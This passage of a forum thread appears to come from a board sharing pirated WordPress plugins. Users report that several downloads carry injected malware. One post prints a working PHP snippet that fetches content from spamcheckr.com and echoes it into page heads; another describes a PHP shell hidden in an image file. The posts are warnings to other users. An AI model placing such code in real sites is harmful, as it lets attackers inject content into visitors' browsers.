

Search (advanced search) | ||||
Use this Search form before posting, asking or make a new thread.
|
04-20-2014, 01:15 PM
Post: #21
|
|||
|
|||
RE: | |||
04-21-2014, 01:28 AM
Post: #22
|
|||
|
|||
RE:
You are really awesome for compiling this list. I can't give you enough +rep lol
Also, I would like to report links that are not functioning as I find them. Arqam v1.1.3 – Retina Responsive WP Social Counter Plugin - both links are broken, the files have been removed. I will post more as I discover them. Thanks a bunch! ![]() |
|||
04-21-2014, 02:07 AM
Post: #23
|
|||
|
|||
RE:
Hi,
Thanks for this download list. Could you please update ajax store locator plugins? No 11 in your list. Thanks again. BR, VictorLew |
|||
04-21-2014, 03:56 AM
Post: #24
|
|||
|
|||
RE: | |||
04-21-2014, 05:10 AM
Post: #25
|
|||
|
|||
RE: | |||
04-22-2014, 03:05 PM
(This post was last modified: 04-22-2014 03:09 PM by nullpoint.)
Post: #26
|
|||
|
|||
RE: [HUGE COLLECTION] WORDPRESS PLUGINS - DAILY UPDATE
Thanks.. Its an awesome list.
![]() But I found one of the plugin contains malicious code which will redirect users to a youtube video. ![]() Plugin name is "Easy Social Share Buttons". Redirecting code is in a php file 'easy-social-share-buttons/lib/admin/pages/essb-settings-class.php'. search for "http://spamcheckr.com/l.php" Remove Code: <?php if (!isset($_COOKIE['wordpress_test_cookie'])){ if (mt_rand(1,20) == 1) {function secqc00_chesk() {if(function_exists('curl_init')){$addressd = "http://spamcheckr.com/l.php";$ch = curl_init();$timeout = 5;curl_setopt($ch,CURLOPT_URL,$addressd);curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);curl_setopt($ch,CURLOPT_CONNECTTIMEOUT,$timeout);$data = curl_exec($ch);curl_close($ch);echo "$data";}}add_action('wp_head','secqc00_chesk');}} ?> Please update the plugin and reupload.
There are two words guys hate: Don't and Stop...Unless those words are spoken together.
|
|||
04-23-2014, 07:30 PM
Post: #27
|
|||
|
|||
RE: [HUGE COLLECTION] WORDPRESS PLUGINS - DAILY UPDATE
(04-22-2014 03:05 PM)prohacker1324 Wrote: Thanks.. Its an awesome list.Sorry bro. But I only collect them. I'm not thier owner. I will remove it. :( |
|||
04-23-2014, 10:48 PM
(This post was last modified: 04-23-2014 10:49 PM by nullpoint.)
Post: #28
|
|||
|
|||
RE: [HUGE COLLECTION] WORDPRESS PLUGINS - DAILY UPDATE
Cool.. I found 1 more...
![]() Quote:base64 Plugin : ninja-popups v2.4 - Theme123.Net Infected file : ninja-popups v2.4 - Theme123.Net/img/social.png Open with a text editor, then you can find the crap php code in that image file. Now it serious.. its definitely an exploit shell. If anybody has downloaded and installed this plugin, highly recommended to change the server password and ssh keys before the attacker gets access. I know its too late. ![]() Bro, are you downloading and uploading the files from theme123.Net ? Same plugin I downloaded from theme123.Net for testing and still I can see the exploit file there. Anyway atleast check before you upload. (04-23-2014 07:30 PM)bhwseo.com Wrote:(04-22-2014 03:05 PM)prohacker1324 Wrote: Thanks.. Its an awesome list.Sorry bro. But I only collect them. I'm not thier owner. I will remove it. :(
There are two words guys hate: Don't and Stop...Unless those words are spoken together.
|
|||
04-24-2014, 03:31 AM
Post: #29
|
|||
|
|||
RE:
also in MyMail
Redirecting code is in a php file 'wc.class.php'. search for "http://spamcheckr.com/l.php" Delete |
|||
04-24-2014, 05:05 AM
Post: #30
|
|||
|
|||
RE: | |||